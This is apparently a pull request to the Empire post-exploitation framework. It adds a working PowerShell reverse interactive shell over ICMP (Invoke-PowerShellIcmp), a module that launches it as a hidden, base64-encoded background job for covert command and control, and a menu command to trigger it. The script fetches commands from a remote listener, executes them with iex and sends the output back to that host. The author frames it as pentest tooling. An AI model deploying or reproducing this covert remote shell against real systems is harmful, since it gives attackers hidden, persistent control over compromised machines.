### PR TITLE
Powershell ICMP backup comm channel

### DIFF
--- a/changelog
+++ b/changelog
@@ -1,3 +1,8 @@
+3/31/2016
+---------
+-Updated mimikatz dlls to version 2.1 alpha
+-Included modification to suppress cmd.exe when spawned via PTH.
+
 1/17/2016
 ---------
 - '--debug 2' now displays debug information to the console as well as the empire.debug file

--- a/data/module_source/management/Invoke-PowerShellIcmp.ps1
+++ b/data/module_source/management/Invoke-PowerShellIcmp.ps1
@@ -1,0 +1,110 @@
+function Invoke-PowerShellIcmp
+{ 
+<#
+.SYNOPSIS
+Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP. 
+
+.DESCRIPTION
+This script can receive commands from a server, execute them and return the result to the server using only ICMP.
+
+The server to be used with it is icmpsh_m.py from the icmpsh tools (https://github.com/inquisb/icmpsh).
+
+.PARAMETER IPAddress
+The IP address of the server/listener to connect to.
+
+.PARAMETER Delay
+Time in seconds for which the script waits for a command from the server. Default is 5 seconds. 
+
+.PARAMETER BufferSize
+The size of output Buffer. Defualt is 128.
+
+.EXAMPLE
+# sysctl -w net.ipv4.icmp_echo_ignore_all=1
+# python icmpsh_m.py 192.168.254.226 192.168.254.1
+
+Run above commands to start a listener on a Linux computer (tested on Kali Linux).
+icmpsh_m.py is a part of the icmpsh tools.
+
+On the target, run the below command.
+
+PS > Invoke-PowerShellIcmp -IPAddress 192.168.254.226
+
+Above shows an example of an interactive PowerShell reverse connect shell. 
+
+.LINK
+http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html
+https://github.com/samratashok/nishang
+#>           
+    [CmdletBinding()] Param(
+
+        [Parameter(Position = 0, Mandatory = $true)]
+        [String]
+        $IPAddress,
+
+        [Parameter(Position = 1, Mandatory = $false)]
+        [Int]
+        $Delay = 5,
+
+        [Parameter(Position = 2, Mandatory = $false)]
+        [Int]
+        $BufferSize = 128
+
+    )
+
+    #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
+    $ICMPClient = New-Object System.Net.NetworkInformation.Ping
+    $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
+    $PingOptions.DontFragment = $True
+
+    # Shell appearance and output redirection based on Powerfun - Written by Ben Turner & Dave Hardy
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
+
+    #Show an interactive PowerShell prompt
+    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
+    $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
+
+    while ($true)
+    {
+        $sendbytes = ([text.encoding]::ASCII).GetBytes('')
+        $reply = $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions)
+        
+        #Check for Command from the server
+        if ($reply.Buffer)
+        {
+            $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
+            $result = (iex -Command $response | Out-String )
+            $sendbytes = ([text.encoding]::ASCII).GetBytes($result)
+            $index = [math]::floor($sendbytes.length/$BufferSize)
+            $i = 0
+
+            #Fragmant larger output into smaller ones to send to the server.
+            if ($sendbytes.length -gt $BufferSize)
+            {
+                while ($i -lt $index )
+                {
+                    $sendbytes2 = $sendbytes[($i*$BufferSize)..(($i+1)*$BufferSize)]
+                    $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
+                    $i +=1
+                }
+                $remainingindex = $sendbytes.Length % $BufferSize
+                if ($remainingindex -ne 0)
+                {
+                    $sendbytes2 = $sendbytes[($i*$BufferSize)..($sendbytes.Length)]
+                    $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null
+                }
+            }
+            else
+            {
+                $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes, $PingOptions) | Out-Null
+            }
+            $sendbytes = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
+            $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
+        }
+        else
+        {
+            Start-Sleep -Seconds $Delay
+        }
+    }
+}
+

--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@@ -1869,6 +1869,25 @@ class AgentMenu(cmd.Cmd):
             l = ModuleMenu(self.mainMenu, "credentials/mimikatz/pth")
             l.do_execute("")
 
+    def do_icmp(self, line):
+        "Executes Reverse ICMP shell for backup."
+
+        credID = line.strip()
+
+        if self.mainMenu.modules.modules["management/rev_icmp_shell"]:
+            # reload the module to reset the default values
+            module = self.mainMenu.modules.reload_module("management/rev_icmp_shell")
+
+            module = self.mainMenu.modules.modules["management/rev_icmp_shell"]
+
+            # set mimikt/pth to use the given CredID
+            module.options['IPAddress']['Value'] = helpers.lhost()
+            # set the agent ID
+            module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name(self.sessionID)
+
+            # execute the mimikatz/pth module
+            l = ModuleMenu(self.mainMenu, "management/rev_icmp_shell")
+            l.do_execute("")
 
     def do_steal_token(self, line):
         "Uses credentials/tokens to impersonate a token for a given process ID."

--- a/lib/modules/management/redirector.py
+++ b/lib/modules/management/redirector.py
@@ -135,7 +135,11 @@ function Invoke-Redirector {
                 $ConnectPort = $parts[2]
             }
             if($ConnectPort -ne ""){
-            
+           	if ((Get-Service iphlpsvc).Status -ne "Running")
+		{
+			Set-Service iphlpsvc -StartupType manual
+			Start-Service iphlpsvc
+		} 
                 $out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
                 if($out){
                     $out

--- a/lib/modules/management/rev_icmp_shell.py
+++ b/lib/modules/management/rev_icmp_shell.py
@@ -1,0 +1,94 @@
+from lib.common import helpers
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        self.info = {
+            'Name': 'Invoke-PowersShellIcmp',
+
+            'Author': ['@IronSpivi'],
+
+            'Description': ("Runs Invoke-PowerShellIcmp by Nikhil 'SamratAshok' Mittal "
+                            "To establish reverse ICMP shell for covert C&C. "
+                            "Based on the original works of Bernardo 'inquisb' Damele"),
+
+            'Background' : False,
+
+            'OutputExtension' : None,
+            
+            'NeedsAdmin' : False,
+
+            'OpsecSafe' : True,
+
+            'MinPSVersion' : '2',
+
+            'Comments': [
+                'https://github.com/samratashok/nishang'
+                'https://github.com/inquisb/icmpsh'
+            ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to run module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'IPAddress' : {
+                'Description'   :   'IP address of the c&c server. (Empire server default)',
+                'Required'      :   True,
+                'Value'         :   helpers.lhost()
+            },
+            'BufferSize' : {
+                'Description'   :   'Size of output buffer',
+                'Required'      :   False,
+                'Value'         :   '128'
+            },
+            'Delay': {
+                'Description': 'Time in seconds for which the script waits for a command from the server',
+                'Required': False,
+                'Value': '5'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+
+
+    def generate(self):
+        raw_input(helpers.color("[!] Don't forget to run \"systemctl -w net.ipv4.icmp_echo_ignore_all=1\" "
+                                "(Press return to continue)", color="Red"))
+        # read in the common module source code
+        moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-PowerShellIcmp.ps1"
+
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+
+        moduleCode = f.read()
+        f.close()
+
+        script_decoded = moduleCode
+
+        script_decoded += "Invoke-PowerShellIcmp"
+
+        for option, values in self.options.iteritems():
+            if option.lower() != "agent":
+                if values['Value'] and values['Value'] != '':
+                    script_decoded += " -" + str(option) + " " + str(values['Value'])
+
+        script = "start-job {powershell -nop -noni -w hidden -e " + helpers.enc_powershell(script_decoded) + "}"
+        return script


### PR DESCRIPTION
This pull request add an execution of an covert icmp channel.
This helped me a lot during my last pentests - I create a backup communication channel based on ICMP so that if my agent becomes stale, I can address the ICMP channel and launch a new one.

The client side is based on the ICMP shell from the nishang project and the icmp server on the attacker is the icmpsh_m.py module which is part of the icmpsh project.